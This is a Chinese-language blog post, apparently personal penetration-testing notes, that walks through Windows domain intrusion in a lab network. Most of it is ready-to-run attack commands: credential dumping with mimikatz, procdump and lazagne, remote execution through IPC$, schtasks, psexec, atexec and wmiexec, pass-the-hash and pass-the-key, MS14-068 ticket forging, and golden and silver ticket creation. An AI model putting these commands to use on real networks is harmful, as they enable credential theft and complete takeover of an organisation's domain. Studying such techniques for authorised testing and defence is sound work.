内网

内网渗透过程:

首先ifconfig /all 看DNS后缀可判断域后缀等信息,然后net time /domain看域控主机时间,这个时候会爆出域控主机名字,ping或者nslook up名字,或域控主机IP地址 .

然后 net user /domain(不加/domian就是看本地用户组)看域用户,这个命令也可以爆出域控主机名字,这里收集到域用户信息后,使用mimikatz,lazagne开始收集密码信息.

其中mimikatz收集域主机用户登录密码信息,这里先使用procdump收集信息然后将dump文件放到本机使用mimikatz跑,lazagne主要收集用户在电脑上保存过的信息.

这里将收集到的用户名,密码收集下来,然后探测内网存活主机,工具可以使用nbscan(扫出来后面带dc就是域控主机).另外也可以换一种命令来探测内网存活主机

命令:for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=”  (使用命令好的是不用对工具做免杀,不好的是也会扫到其他网络设备).

扫出来ip后,利用密码,尝试建立ipc连接   命令:net use \\192.168.220.131\ipc$ "123456Ly" /user:liu.com\administrator  连接成功会提示命令成功完成.

连接成功后就可以执行计划任务了,其中小于windows2012使用at,大于windows2012使用schtasks.,先使用copy add.bat \\192.168.220.131\c$,将add.bat复制到

被害主机c盘,win2012之前系统  at \\192.168.220.130 20:55 c:\add.bat  ,win 2012之后 schtasks /create /s 192.168.220.131 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F  运行 schtasks /run /s 192.168.220.131 /tn adduser..   at   schtasks  需要知道明文密码.

其中使用atexec.exe工具可以密文hash连接,连接口令  atexec.exe -hashes :ccef208c54654564564654564654 ./administrator@198.168.220.130 "whoami"

当然通过收集到的ip 用户和密码一个一个的尝试很浪费时间

以上都是通过循环一个变量,当然也可以自己写python配置多个变量,但是条件是对方电脑有python环境.

win2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码,2012以下打了补丁也无法获取明文密码.解决办法

1.使用工具hashcat暴力破解 hashcat -a 0 -m 1000 hash file --force

2.psexec  也可以通过hash传递远程执行   #相对于atexec比较好,第一不用免杀,第二可以直接连接,第三是全自动.

明文 psexec \\192.168.220.131 -u administrator -p 123456Ly -s cmd

hash psexec -hashes : sadsadasdsadsad ./administrator@192.168.220.131   # sadsadasdsadsad为hash值

3.WMI通过135端口服务利用  #不会留下痕迹  自带cscript全自动调用cmd需要利用wmiexec.vbs(不会被杀).明文没有密文,但是如果没有破解出账号和明文密码,也可以配合哈希传递或票据注入功能一起使用,先进行传递或注入,然后再使用WMIEXEC即可。

wmic /node:192.168.1.1 /user:administrator/password:123456 process call create "cmd.exe /c ipconfig >c:1.txt"  #无回显不常用

cscript //nologo wmiexec.vbs /shell 192.168.220.131 administrator 123456ly

4.wmiexec明文或hash 有回显exe

wmiexec -hashes :asdsdsadsadsad ./administrator@192.168.220.131 "whoami"   #asdsdsadsadsad为hash值

 

PTH:ntml的值(2003之前是LM)  PTT:利用票据凭证TGT(相当于cookie) PTK:利用ekeys aes256进行渗透测试

PTH:获取sekurlsa::logonPasswords     # privilege::debug  

获取ntml保存下来在mimikatz执行如下命令:sekurlsa::pth /user:administrator /domain:liu /ntlm:asdsadasdsadsadas    #asdsadasdsadsadas ntlm值这里是我乱打的

会弹出一个cmd窗口不需要密码直接连接执行命令,dir \\192.168.220.131\c$

如果是本机的话sekurlsa::pth /user:administrator /domain:workgroup /ntlm:asdsadasdsadsadas...如果打了补丁KB2871997只能域administrator连接

PTK:获取sekurlsa::ekeys

如果打了补丁就可以连接所有用户.sekurlsa::pth /user:administrator /domain:workgroup /aes256:asdsadasdsadsadas    #asdsadasdsadsadas aes值这里是我乱打的

PTT:利用协议攻击

第一种利用漏洞:能实现普通用户直接获取域控system权限

1.cmd使用whoami/user命令获取sid为 S-1-5-21-1477929284-1972872092-2968262907-500

2.清空机器中凭证,直接使用mimikatz执行命令kerberos::list    和    kerberos::ptc   

3.利用ms14-068生成TGT数据    ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码

4.票据注入内存

mimikatz.exe直接这些 kerberos::ptc TGT_liuyang@liu.com.ccache    dir \\WIN-TOR4BO6GFKC\c$

第二种借助工具kekeo      #不需要获取管理员权限

1.直接cmd打开kekeo 在窗口输入下面命令  tgt::ask /user:liuyang /domain:liu.com /ntlm:518b98ad4178a53695dc997aa02d455c

2.导入票据 kerberos::ptt TGT_liuyang@LIU.COM_krbtgt~liu.com@LIU.COM.kirbi

 

黄金票据  白银票据  (cookie)

黄金票据

 前提 域控的hash(ntml)值,域控的sid值

1. 打开mimikatz执行命令  lsadump::dcsync /domian:liu.com /user:krbtgt    获取到了sid和域控 krbtgt的hash,(krbtgt用户派生密钥,可以理解成获取krbtgt的hash,然后利用krbtgt去生成域内任何一个用户的密钥)

2.mimikatz删除票据 kerberos::purge

3.执行命令 kerberos::golden /user:liuyang /domain:liu.com /sid:S-1-5-21-1477929284-1972872092-2968262907-502 /krbtgt:7984eefb31e4dcc2d08f12e0a442fccc /ptt

4.查看域主机  net group "domain computers" /domain  看到LY-PC$     验证  dir  \\LY-PC.liu.com\c$

白银票据

目标域内主机的hash值(ntml)

kerberos::golden /domain:liu.com /sid:S-1-5-21-1477929284-1972872092-2968262907-502 /target:LY-PC.liu.com /service:cifs /rc4:518b98ad4178a53695dc997aa02d455c /user:liuyang /ptt

黄金白银票据制作好后,我的不能使用ip地址  都是使用主机地址,如dir \\LY-PC.liu.com\c$      或copy kekeo.zip \\LY-PC.liu.com\c$

金票和银票的区别

获取的权限不同

金票:伪造的TGT,可以获取任意Kerberos的访问权限
银票:伪造的ST,只能访问指定的服务,如CIFS

认证流程不同

金票:同KDC交互,但不同AS交互
银票:不同KDC交互,直接访问Server

加密方式不同

金票:由krbtgt NTLM Hash 加密
银票:由服务账号 NTLM Hash 加密

 

posted @   Po-Jian  阅读(325)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示